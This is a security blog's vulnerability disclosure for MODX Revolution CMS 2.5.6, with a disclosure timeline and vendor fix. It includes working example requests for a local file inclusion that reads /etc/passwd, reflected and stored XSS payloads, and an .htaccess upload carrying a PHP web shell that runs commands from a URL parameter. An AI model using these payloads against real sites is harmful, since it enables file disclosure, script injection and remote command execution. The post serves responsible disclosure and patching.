MODX Revolution CMS 2.5.6


Modx Revolution is great CMS, that is Open Source, UX friendly and easy to use. However, in a version 2.5.6 and lower we have identified multiple vulnerabilities.

Unauthenticated Local File Inclusion

The attacker is able to include and execute arbitrary files on web server due to insufficient validation of user supplied argument action. However, this vulnerability is exploitable only when server uses PHP 5.3.3, which is minimal version of PHP supported by Modx Revolution 2.5.6.

Example request with payload:

GET /setup/index.php?action=../../../../../../../etc/passwd%00 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 0
Cookie: PHPSESSID=20410ami2ep7vpa0bt33bcv464


Multiple Unauthenticated XSSs

The attacker is able to trigger Reflected XSS by injecting payloads into several fields on setup page.

GET /setup/index.php?action=database&amp;database_type="><script>alert(1)<script> HTTP/1.1
Host: localhost
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Cookie: modx_setup_language=en; PHPSESSID=20410ami2ep7vpa0bt33bcv464


Authenticated Code Execution

User with file upload permissions is able to execute arbitrary server code. CMS blocks file extensions like .php or .exe, however file with extension .htaccess is allowed. Therefore, the user is able to upload a file with the name .htaccess into specified folder. This file can contain php code, which is appended to every requested file with extension .php in specified folder.

Example scenario:
1, The attacker logs into Modx Revolution
2, The attacker uploads file with name .htaccess and following content:

php_value auto_prepend_file .htaccess
php_value output_buffering 1

###### SHELL ###### <?php ob_clean(); if ($_GET['c'] != '') { passthru($_GET['c']." 

3, The attacker than visits URL http://localhost/?c=ls%20-al and he gets following response:

total 29252
drwxrwxrwx 2 root root        0 Apr 10 15:45 .
drwxrwxrwx 2 root root        0 Apr  7 13:51 ..
-rwxrwxrwx 1 root root      244 Apr 10 15:44 .htaccess
drwxrwxrwx 2 root root        0 Mar 29 11:53 assets
-rwxrwxrwx 1 root root      294 Mar 29 11:53 config.core.php
drwxrwxrwx 2 root root        0 Mar 29 11:50 connectors
drwxrwxrwx 2 root root        0 Mar 29 11:53 core
-rwxrwxrwx 1 root root   198719 Mar 23 16:24 dump.sql
-rwxrwxrwx 1 root root     3441 Mar 28 08:42 ht.access
-rwxrwxrwx 1 root root     1922 Mar 28 08:42 index.php
drwxrwxrwx 2 root root        0 Mar 29 11:50 manager
drwxrwxrwx 2 root root        0 Apr  3 11:13 setup


Authenticated Stored XSS

User with resource edit permissions can inject XSS payload into title of any post. This malicious payload will be trigerred by every user, when they visit this post.

Example request, which creates post with malicious pagetitle:

POST /connectors/index.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 3823
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfuNRFVB7kulIsnU4
Cookie: PHPSESSID=vicnm3b9laomhm7pllfgnbdf95

Content-Disposition: form-data; name="pagetitle"

Content-Disposition: form-data; name="longtitle"

Content-Disposition: form-data; name="description"


When victim (authenticated or unauthenticated) visits this post, alert with current domain is triggered.


Unauthenticated Reflected XSS via HOST header

The attacker is able to trigger XSS by injecting payload into HOST header. However, likelihood of this attack is minimal, becasue it is hard to exploit. Exploiting is possible via Cache Poisoning technique for example.

Example request with payload:

GET / HTTP/1.1
Host: localhost"<svg onload=alert(1)>
Connection: close
Content-Length: 0



Modx Revolution 2.5.7 contains all metioned patches, so it is recommended to update to the latest version.

Report timeline

29.3.2017 Vendor informed about mentioned vulnerabilities
21.4.2017 Vendor released new version of Modx Revolution with fixed vulnerabilites
26.4.2017 Disclosed to public
18.5.2017 Assigned CVEs


These vulnerabilities were discovered by Tomas Melicher from Citadelo.


About the author

Tomáš Melicher
Ethical hacker
I started to work as a web developer in big projects for government and financial institutions. When developing a particular software, I always asked myself “what will happen, when somebody tries to break it”. And this approach is the reason why I work at Citadelo at the moment, where I can do these kinds of things on a daily basis. Apart from hacking banks and other institutions, I can be seen playing table tennis or doing street workouts.
Show more from author

Related blogs

How to order a pen test

Blog | | Martin Hanic
Although people working in the IT security industry may consider this question to be as trivial as "How to order a phone charger", for many, writing a purchase order for a penetration test can be like designing a nuclear power plant.

Unofficial Patch Tuesday – MSMQ Privilege Escalation Vulnerability Hotfix

Blog | | Citadelo
This security patch resolves a public vulnerability in the Windows Message Queuing Service (MSMQ) discovered by KoreLogic

We found vulnerability of CMS Made Simple

Blog | | Citadelo
CMS Made Simple is a free, open source CMS to provide developers, programmers and site owners a web-based development and administration area. In 2010 it won the Packt Publishing annual award for open source content management.

ExtendedMacro – BurpSuite plugin

Blog | | Citadelo
BurpSuite Proxy is one of the most used HTTP proxy application for web penetration testers. This tool is one of the best in its category, but sometimes we encounter a situation requiring additional functionality which is not provided by Burp itself.